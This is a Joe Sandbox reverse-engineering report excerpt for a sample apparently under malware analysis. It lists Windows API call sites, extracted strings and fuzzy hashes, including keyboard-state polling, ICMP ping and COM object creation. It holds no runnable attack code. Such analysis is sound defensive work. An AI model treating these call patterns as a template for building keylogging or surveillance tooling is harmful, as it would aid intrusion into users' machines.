                                                                  • GetAsyncKeyState.USER32(000000A1), ref: 00392FA7
                                                                  • GetKeyState.USER32(000000A1), ref: 00392FB8
                                                                  • GetAsyncKeyState.USER32(00000011), ref: 00392FE4
                                                                  • GetKeyState.USER32(00000011), ref: 00392FF2
                                                                  • GetAsyncKeyState.USER32(00000012), ref: 0039301B
                                                                  • GetKeyState.USER32(00000012), ref: 00393029
                                                                  • GetAsyncKeyState.USER32(0000005B), ref: 00393052
                                                                  • GetKeyState.USER32(0000005B), ref: 00393060
                                                                  Similarity
                                                                  • API ID: State$Async$Keyboard
                                                                  • String ID:
                                                                  • API String ID: 541375521-0
                                                                  • Opcode ID: adb82805bca0a1844a6b880bf5a5c2c82c99fcc75a5d6435b8b56c0f683363bb
                                                                  • Instruction ID: 14db3bd741a9bd384d312539b2a610999d4e511df705391786f9cc7fff92d0cc
                                                                  • Opcode Fuzzy Hash: adb82805bca0a1844a6b880bf5a5c2c82c99fcc75a5d6435b8b56c0f683363bb
                                                                  • Instruction Fuzzy Hash: DF51C661A04B8439FF37EBA488507EFBBB49F11344F09459ED5C25A1C2DA549B8CC7A2
                                                                  APIs
                                                                  • GetDlgItem.USER32(?,00000001), ref: 0038ED1E
                                                                  • GetWindowRect.USER32(00000000,?), ref: 0038ED30
                                                                  • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0038ED8E
                                                                  • GetDlgItem.USER32(?,00000002), ref: 0038ED99
                                                                  • GetWindowRect.USER32(00000000,?), ref: 0038EDAB
                                                                  • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0038EE01
                                                                  • GetDlgItem.USER32(?,000003E9), ref: 0038EE0F
                                                                  • GetWindowRect.USER32(00000000,?), ref: 0038EE20
                                                                  • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0038EE63
                                                                  • GetDlgItem.USER32(?,000003EA), ref: 0038EE71
                                                                  • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0038EE8E
                                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 0038EE9B
                                                                  Similarity
                                                                  • API ID: Window$ItemMoveRect$Invalidate
                                                                  • String ID:
                                                                  • API String ID: 3096461208-0
                                                                  • Opcode ID: 520250bd206e9874191361418107346311dcc2c7f7cb5159618260da94977547
                                                                  • Instruction ID: 6f8ab6477cde82a1f1826d4ccd09bfbef6db2f24d0d371d4315a033f4366a233
                                                                  • Opcode Fuzzy Hash: 520250bd206e9874191361418107346311dcc2c7f7cb5159618260da94977547
                                                                  • Instruction Fuzzy Hash: 37512EB1B00205AFDB19DF68DD85AAEBBBAEB88300F558169F519D7290D770ED048B50
                                                                  APIs
                                                                    • Part of subcall function 0036B9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,0036B759,?,00000000,?,?,?,?,0036B72B,00000000,?), ref: 0036BA58
                                                                  • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,0036B72B), ref: 0036B7F6
                                                                  • KillTimer.USER32(00000000,?,00000000,?,?,?,?,0036B72B,00000000,?,?,0036B2EF,?,?), ref: 0036B88D
                                                                  • DestroyAcceleratorTable.USER32(00000000), ref: 003CD8A6
                                                                  • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0036B72B,00000000,?,?,0036B2EF,?,?), ref: 003CD8D7
                                                                  • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0036B72B,00000000,?,?,0036B2EF,?,?), ref: 003CD8EE
                                                                  • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0036B72B,00000000,?,?,0036B2EF,?,?), ref: 003CD90A
                                                                  • DeleteObject.GDI32(00000000), ref: 003CD91C
                                                                  Similarity
                                                                  • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                  • String ID:
                                                                  • API String ID: 641708696-0
                                                                  • Opcode ID: e24d5cbf53cf78f2a945f5c2c63d4f89f2658482122274006558e2c5821bb358
                                                                  • Instruction ID: 46cf0892a781300487966049726c7c99ebd407f898b4364a7c4c724e2bb2cb0d
                                                                  • Opcode Fuzzy Hash: e24d5cbf53cf78f2a945f5c2c63d4f89f2658482122274006558e2c5821bb358
                                                                  • Instruction Fuzzy Hash: BE612430501700DFDB279F18E988B65BBA9FF95315F16852EE1868BA78C771A8D0CF84
                                                                  APIs
                                                                    • Part of subcall function 0036B526: GetWindowLongW.USER32(?,000000EB), ref: 0036B537
                                                                  • GetSysColor.USER32(0000000F), ref: 0036B438
                                                                  Similarity
                                                                  • API ID: ColorLongWindow
                                                                  • String ID:
                                                                  • API String ID: 259745315-0
                                                                  • Opcode ID: 2e98bbfef75c38c15b0e1532c0fc11cdebbfa52626a41106ae18d9f46fa320ae
                                                                  • Instruction ID: 25e4fb257954a764adaebd7524d1ebb648db7f84e81c96691555e2fa530f36e5
                                                                  • Opcode Fuzzy Hash: 2e98bbfef75c38c15b0e1532c0fc11cdebbfa52626a41106ae18d9f46fa320ae
                                                                  • Instruction Fuzzy Hash: 8341A3300011549FDB235F29EC89BB97B6AEB06731F158265FD65CE1EADB308C81DB21
                                                                  Similarity
                                                                  • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                                                  • String ID:
                                                                  • API String ID: 136442275-0
                                                                  • Opcode ID: 63bb37b6049b121342fe3e7fc6d1c09f66c7f2efb13311e176ca14479c4f67ea
                                                                  • Instruction ID: 13ee9ea8082828ed9af3b06406c1640734947260016b19d9d50ced21234db781
                                                                  • Opcode Fuzzy Hash: 63bb37b6049b121342fe3e7fc6d1c09f66c7f2efb13311e176ca14479c4f67ea
                                                                  • Instruction Fuzzy Hash: 4C411EB784621CAECF77DB94CC46DDA73BCEB44310F0041A6F659AA051EA74ABE48F50
                                                                  APIs
                                                                  • CharLowerBuffW.USER32(003EDC00,003EDC00,003EDC00), ref: 0039D7CE
                                                                  • GetDriveTypeW.KERNEL32(?,00403A70,00000061), ref: 0039D898
                                                                  • _wcscpy.LIBCMT ref: 0039D8C2
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: BuffCharDriveLowerType_wcscpy
                                                                  • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                  • API String ID: 2820617543-1000479233
                                                                  • Opcode ID: 3515caa2c802460ab74c50da9dacc431b7ee058d9b12157dfcf64c5e4d2dbca2
                                                                  • Instruction ID: 2152c428eb73459b7a7349421dfff97856e5bf9be7a398e4733ab0c492dd1a0b
                                                                  • Opcode Fuzzy Hash: 3515caa2c802460ab74c50da9dacc431b7ee058d9b12157dfcf64c5e4d2dbca2
                                                                  • Instruction Fuzzy Hash: 335187751083409FCB12EF14D892A6FB7A9EF84354F20C92DF99A5B2A2DB71DD09CB41
                                                                  APIs
                                                                  • __swprintf.LIBCMT ref: 003593AB
                                                                  • __itow.LIBCMT ref: 003593DF
                                                                    • Part of subcall function 00371557: _xtow@16.LIBCMT ref: 00371578
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                   • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: __itow__swprintf_xtow@16
                                                                  • String ID: %.15g$0x%p$False$True
                                                                  • API String ID: 1502193981-2263619337
                                                                  • Opcode ID: bff481d588befdfae9226ea1cb2bca5a2f59bf81405cecb1af313158598bd3f5
                                                                  • Instruction ID: ee60614d0039fcc68a916cf1e40ede7b4dcf5de3b5138aa58e2cf7b953f8460d
                                                                  • Opcode Fuzzy Hash: bff481d588befdfae9226ea1cb2bca5a2f59bf81405cecb1af313158598bd3f5
                                                                  • Instruction Fuzzy Hash: EB41C576500204EFDB269B64D952F69B7E8EF44301F2084AFE549DB1A1EA319D45CB50
                                                                  APIs
                                                                  • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 003BA259
                                                                  • CreateCompatibleDC.GDI32(00000000), ref: 003BA260
                                                                  • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 003BA273
                                                                  • SelectObject.GDI32(00000000,00000000), ref: 003BA27B
                                                                  • GetPixel.GDI32(00000000,00000000,00000000), ref: 003BA286
                                                                  • DeleteDC.GDI32(00000000), ref: 003BA28F
                                                                  • GetWindowLongW.USER32(?,000000EC), ref: 003BA299
                                                                  • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 003BA2AD
                                                                  • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 003BA2B9
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                  • String ID: static
                                                                  • API String ID: 2559357485-2160076837
                                                                  • Opcode ID: 48ae9eb931e798f4b72741b7b37653931320bfb7d67b84075eb2c30f6d20225b
                                                                  • Instruction ID: cdd24f66021bfadd2a057ead837283e175c6cc919ffe985ef9ef77cb7bd95e0f
                                                                  • Opcode Fuzzy Hash: 48ae9eb931e798f4b72741b7b37653931320bfb7d67b84075eb2c30f6d20225b
                                                                  • Instruction Fuzzy Hash: FE317E31101615BFDF125FA4EC49FEA3B6DFF09364F110215FA19AA0A0C736D811DBA5
                                                                  APIs
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: _wcscpy$CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                                                                  • String ID: 0.0.0.0
                                                                  • API String ID: 2620052-3771769585
                                                                  • Opcode ID: a90dd9b155b905016dccd00c412614e700f41e7c40551a77cb0a6f99f1fd6b77
                                                                  • Instruction ID: 865ba10e830ecb06c40614e0f5869fc37b237807b3940c61afb95a169ae927f1
                                                                  • Opcode Fuzzy Hash: a90dd9b155b905016dccd00c412614e700f41e7c40551a77cb0a6f99f1fd6b77
                                                                  • Instruction Fuzzy Hash: 5F110A71505215AFCF276B70BC0AEDA77ACDF40710F0140A6F14AAA081EFB4DE858B50
                                                                  APIs
                                                                  • _memset.LIBCMT ref: 00375047
                                                                    • Part of subcall function 00377C0E: __getptd_noexit.LIBCMT ref: 00377C0E
                                                                  • __gmtime64_s.LIBCMT ref: 003750E0
                                                                  • __gmtime64_s.LIBCMT ref: 00375116
                                                                  • __gmtime64_s.LIBCMT ref: 00375133
                                                                  • __allrem.LIBCMT ref: 00375189
                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 003751A5
                                                                  • __allrem.LIBCMT ref: 003751BC
                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 003751DA
                                                                  • __allrem.LIBCMT ref: 003751F1
                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0037520F
                                                                  • __invoke_watson.LIBCMT ref: 00375280
                                                                  Similarity
                                                                  • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                  • String ID:
                                                                  • API String ID: 384356119-0
                                                                  • Opcode ID: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
                                                                  • Instruction ID: 48a1c94db39774159b4404f51d7228005df11d293b10c042a3def5f0bfbce970
                                                                  • Opcode Fuzzy Hash: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
                                                                  • Instruction Fuzzy Hash: 99711A71A00F16ABE73AAE78CC41B5A73A8BF14364F15C529F418DB681E7B8DD4087D0
                                                                  APIs
                                                                  • _memset.LIBCMT ref: 00394DF8
                                                                  • GetMenuItemInfoW.USER32(00411708,000000FF,00000000,00000030), ref: 00394E59
                                                                  • SetMenuItemInfoW.USER32(00411708,00000004,00000000,00000030), ref: 00394E8F
                                                                  • Sleep.KERNEL32(000001F4), ref: 00394EA1
                                                                  • GetMenuItemCount.USER32(?), ref: 00394EE5
                                                                  • GetMenuItemID.USER32(?,00000000), ref: 00394F01
                                                                  • GetMenuItemID.USER32(?,-00000001), ref: 00394F2B
                                                                  • GetMenuItemID.USER32(?,?), ref: 00394F70
                                                                  • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00394FB6
                                                                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00394FCA
                                                                  • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00394FEB
                                                                  Similarity
                                                                  • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                                  • String ID:
                                                                  • API String ID: 4176008265-0
                                                                  • Opcode ID: 3f01b14e49c4c437d7dae4fb1732252729b6c90b19c480e7ba0d23773dba1517
                                                                  • Instruction ID: d6983a5f3f85e07f8cb0e9aa6124d3af59294d7ac71316e05d7f06fb691e1825
                                                                  • Opcode Fuzzy Hash: 3f01b14e49c4c437d7dae4fb1732252729b6c90b19c480e7ba0d23773dba1517
                                                                  • Instruction Fuzzy Hash: CD617E7190024AAFDF23CFA4E884EAE7BB9FB45304F154199F542A7251D731AD46CB21
                                                                  APIs
                                                                  • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 003B9C98
                                                                  • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 003B9C9B
                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 003B9CBF
                                                                  • _memset.LIBCMT ref: 003B9CD0
                                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 003B9CE2
                                                                  • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 003B9D5A
                                                                  Similarity
                                                                  • API ID: MessageSend$LongWindow_memset
                                                                  • String ID:
                                                                  • API String ID: 830647256-0
                                                                  • Opcode ID: d9a5329e48714dc7b5fd775265a6a5d66f05f4a1946d852fbd18e5054371f6ad
                                                                  • Instruction ID: b3907047b669ae684401fdd4297d8e71c3d642681906dc7b00d0975d13541680
                                                                  • Opcode Fuzzy Hash: d9a5329e48714dc7b5fd775265a6a5d66f05f4a1946d852fbd18e5054371f6ad
                                                                  • Instruction Fuzzy Hash: 10616B75900208AFDB12DFA8CC81FEEB7B8EB09714F14415AFB15EB2A1D774A941DB50
                                                                  APIs
                                                                  • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,?), ref: 003894FE
                                                                  • SafeArrayAllocData.OLEAUT32(?), ref: 00389549
                                                                  • VariantInit.OLEAUT32(?), ref: 0038955B
                                                                  • SafeArrayAccessData.OLEAUT32(?,?), ref: 0038957B
                                                                  • VariantCopy.OLEAUT32(?,?), ref: 003895BE
                                                                  • SafeArrayUnaccessData.OLEAUT32(?), ref: 003895D2
                                                                  • VariantClear.OLEAUT32(?), ref: 003895E7
                                                                  • SafeArrayDestroyData.OLEAUT32(?), ref: 003895F4
                                                                  • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 003895FD
                                                                  • VariantClear.OLEAUT32(?), ref: 0038960F
                                                                  • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0038961A
                                                                  Similarity
                                                                  • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                  • String ID:
                                                                  • API String ID: 2706829360-0
                                                                  • Opcode ID: c27fdf74fb0d554aa0e9ff9edeca5118e0b7e5d7b3a347e51d7dece4943d261d
                                                                  • Instruction ID: 37efcc91f80928bde4ed5a28b7c24c9fcbea7630aefde3fbed91428e6c48b20e
                                                                  • Opcode Fuzzy Hash: c27fdf74fb0d554aa0e9ff9edeca5118e0b7e5d7b3a347e51d7dece4943d261d
                                                                  • Instruction Fuzzy Hash: 62414131900219AFCB02EFA5DC44AEEBF7DFF08354F048066E512A7261DB70EA45CBA0
                                                                  APIs
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: Variant$ClearInit$_memset
                                                                  • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop$h?@$|?@
                                                                  • API String ID: 2862541840-1869459913
                                                                  • Opcode ID: c65f9f861e5552ac4944ef8f95ab31da68c149561defbcf20fded93066fa07f8
                                                                  • Instruction ID: 69a4b8192d9b81a3f3b3cb112716184f1e5c39b2de692750a25b89ae49acb7aa
                                                                  • Opcode Fuzzy Hash: c65f9f861e5552ac4944ef8f95ab31da68c149561defbcf20fded93066fa07f8
                                                                  • Instruction Fuzzy Hash: 34919171A00215EBDF26DFA5DC44FAEBBB8EF46710F10855AF515AB282DB709940CFA0
                                                                  APIs
                                                                    • Part of subcall function 0035936C: __swprintf.LIBCMT ref: 003593AB
                                                                    • Part of subcall function 0035936C: __itow.LIBCMT ref: 003593DF
                                                                  • CoInitialize.OLE32 ref: 003AADF6
                                                                  • CoUninitialize.OLE32 ref: 003AAE01
                                                                  • CoCreateInstance.OLE32(?,00000000,00000017,003DD8FC,?), ref: 003AAE61
                                                                  • IIDFromString.OLE32(?,?), ref: 003AAED4
                                                                  • VariantInit.OLEAUT32(?), ref: 003AAF6E
                                                                  • VariantClear.OLEAUT32(?), ref: 003AAFCF
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                                  • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                  • API String ID: 834269672-1287834457
                                                                  • Opcode ID: fe1178c4361813001ccbdf0b09eaf4af36530694b508c644d48edfe9d685c0ba
                                                                  • Instruction ID: 0a59b2f668dcfa4e915d58397ba900f26b5668c52868f9ece1f5a5303a173abb
                                                                  • Opcode Fuzzy Hash: fe1178c4361813001ccbdf0b09eaf4af36530694b508c644d48edfe9d685c0ba
                                                                  • Instruction Fuzzy Hash: 1E619C72208B019FD716DF64D848F6AB7E8EF8A714F10451AF9859B2A1C770ED48CB93
                                                                  APIs
                                                                  • WSAStartup.WSOCK32(00000101,?), ref: 003A8168
                                                                  • inet_addr.WSOCK32(?,?,?), ref: 003A81AD
                                                                  • gethostbyname.WSOCK32(?), ref: 003A81B9
                                                                  • IcmpCreateFile.IPHLPAPI ref: 003A81C7
                                                                  • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 003A8237
                                                                  • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 003A824D
                                                                  • IcmpCloseHandle.IPHLPAPI(00000000), ref: 003A82C2
                                                                  • WSACleanup.WSOCK32 ref: 003A82C8
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                  • String ID: Ping
                                                                  • API String ID: 1028309954-2246546115
                                                                  • Opcode ID: 63751e0e30786cb85e59a5539f6011c4aacb11fe815e51879460ad057cec7a3c
                                                                  • Instruction ID: 19706d7ee528856355e56123ba451f3560602aca50604ed58aa4951b613ee4fb
                                                                  • Opcode Fuzzy Hash: 63751e0e30786cb85e59a5539f6011c4aacb11fe815e51879460ad057cec7a3c
                                                                  • Instruction Fuzzy Hash: 7151A1316047009FDB22AF64DC49B6ABBE8FF49310F05896AF956DB2A0DB70E805CB41
                                                                  APIs
                                                                  • SetErrorMode.KERNEL32(00000001), ref: 0039E396
                                                                  • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0039E40C
                                                                  • GetLastError.KERNEL32 ref: 0039E416
                                                                  • SetErrorMode.KERNEL32(00000000,READY), ref: 0039E483
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                   • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Error$Mode$DiskFreeLastSpace
                                                                  • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                  • API String ID: 4194297153-14809454
                                                                  • Opcode ID: d7c5afb9951bdddae4440f7063aa8c599b17ba720bb46e61eb8d01e189e5ea86
                                                                  • Instruction ID: 944556dd8fb718246d018949ef7ceb169368cc32d0ffa9ccfd285a7c08d39f54
                                                                  • Opcode Fuzzy Hash: d7c5afb9951bdddae4440f7063aa8c599b17ba720bb46e61eb8d01e189e5ea86
                                                                  • Instruction Fuzzy Hash: 6231B736A002059FDF03EF65D845FBD7BB8EF04705F148026E906EB291DB749A05CB91
                                                                  APIs
                                                                  • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 0038B98C
                                                                  • GetDlgCtrlID.USER32 ref: 0038B997
                                                                  • GetParent.USER32 ref: 0038B9B3
                                                                  • SendMessageW.USER32(00000000,?,00000111,?), ref: 0038B9B6
                                                                  • GetDlgCtrlID.USER32(?), ref: 0038B9BF
                                                                  • GetParent.USER32(?), ref: 0038B9DB
                                                                  • SendMessageW.USER32(00000000,?,?,00000111), ref: 0038B9DE
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                   • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$CtrlParent
                                                                  • String ID: ComboBox$ListBox
                                                                  • API String ID: 1383977212-1403004172
                                                                  • Opcode ID: b2178a4451310054c778aba4b17a1493b748b6a8340306810e0beaaab3f37030
                                                                  • Instruction ID: 9cbe72a68cc3369e67aecb2bffd5c4817dce2b5e29bbc02c11af63311e0f0ca9
                                                                  • Opcode Fuzzy Hash: b2178a4451310054c778aba4b17a1493b748b6a8340306810e0beaaab3f37030
                                                                  • Instruction Fuzzy Hash: 7F21D674A00204BFCF06BBA0DC86EBEB778EF45310F500156F951A72E1DBB49919DB60
                                                                  APIs
                                                                  • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 0038BA73
                                                                  • GetDlgCtrlID.USER32 ref: 0038BA7E
                                                                  • GetParent.USER32 ref: 0038BA9A
                                                                  • SendMessageW.USER32(00000000,?,00000111,?), ref: 0038BA9D
                                                                  • GetDlgCtrlID.USER32(?), ref: 0038BAA6
                                                                  • GetParent.USER32(?), ref: 0038BAC2
                                                                  • SendMessageW.USER32(00000000,?,?,00000111), ref: 0038BAC5
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                   • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$CtrlParent
                                                                  • String ID: ComboBox$ListBox
                                                                  • API String ID: 1383977212-1403004172
                                                                  • Opcode ID: 48cdbcfb0777985ed7bf049fea6f4053be068af38bfda9bfcb4602e101852eeb
                                                                  • Instruction ID: a2e515b3d269a7ad43c62838c1f60a604a572b23e583d6ba7afcd44d358f7278
                                                                  • Opcode Fuzzy Hash: 48cdbcfb0777985ed7bf049fea6f4053be068af38bfda9bfcb4602e101852eeb
                                                                  • Instruction Fuzzy Hash: 5521F574A40204BFDB06BB64CC85EFEB778EF45300F100056F951A71E1DBB99919DB60
                                                                  APIs
                                                                  • GetParent.USER32 ref: 0038BAE3
                                                                  • GetClassNameW.USER32(00000000,?,00000100), ref: 0038BAF8
                                                                  • _wcscmp.LIBCMT ref: 0038BB0A
                                                                  • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 0038BB85
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                   • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: ClassMessageNameParentSend_wcscmp
                                                                  • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                  • API String ID: 1704125052-3381328864
                                                                  • Opcode ID: 4dd875ffba829944530551426d2888eb58f8796809369c552523c01c68e7e999
                                                                  • Instruction ID: 1cc2ab800329d65d6ce3672b417c238b9a7b2e48b81e566903b7c3c9f9600ea8
                                                                  • Opcode Fuzzy Hash: 4dd875ffba829944530551426d2888eb58f8796809369c552523c01c68e7e999
                                                                  • Instruction Fuzzy Hash: 7B110A76648307FAFA377624EC0ADA6B79C9B15720F200063F908F40D5FFA598114658
                                                                  APIs
                                                                  • VariantInit.OLEAUT32(?), ref: 003AB2D5
                                                                  • CoInitialize.OLE32(00000000), ref: 003AB302
                                                                  • CoUninitialize.OLE32 ref: 003AB30C
                                                                  • GetRunningObjectTable.OLE32(00000000,?), ref: 003AB40C
                                                                  • SetErrorMode.KERNEL32(00000001,00000029), ref: 003AB539
                                                                  • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002), ref: 003AB56D
                                                                  • CoGetObject.OLE32(?,00000000,003DD91C,?), ref: 003AB590
                                                                  • SetErrorMode.KERNEL32(00000000), ref: 003AB5A3
                                                                  • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 003AB623
                                                                  • VariantClear.OLEAUT32(003DD91C), ref: 003AB633
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                   • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                  • String ID:
                                                                  • API String ID: 2395222682-0
                                                                  • Opcode ID: 6b7318fefb764e8f60834e5bedff86c66bc44f6b0964791b7f0d1d7b980daeca
                                                                  • Instruction ID: eeb43485134ac15261ecd69e4f5f55cd337d77ac9873d5b7fc04af457669cddd
                                                                  • Opcode Fuzzy Hash: 6b7318fefb764e8f60834e5bedff86c66bc44f6b0964791b7f0d1d7b980daeca
                                                                  • Instruction Fuzzy Hash: 75C105716083019FC702DF65C884A6AB7E9FF8A348F04495DF98A9B262DB71ED05CB52
                                                                  APIs
                                                                  • __lock.LIBCMT ref: 0037ACC1
                                                                    • Part of subcall function 00377CF4: __mtinitlocknum.LIBCMT ref: 00377D06
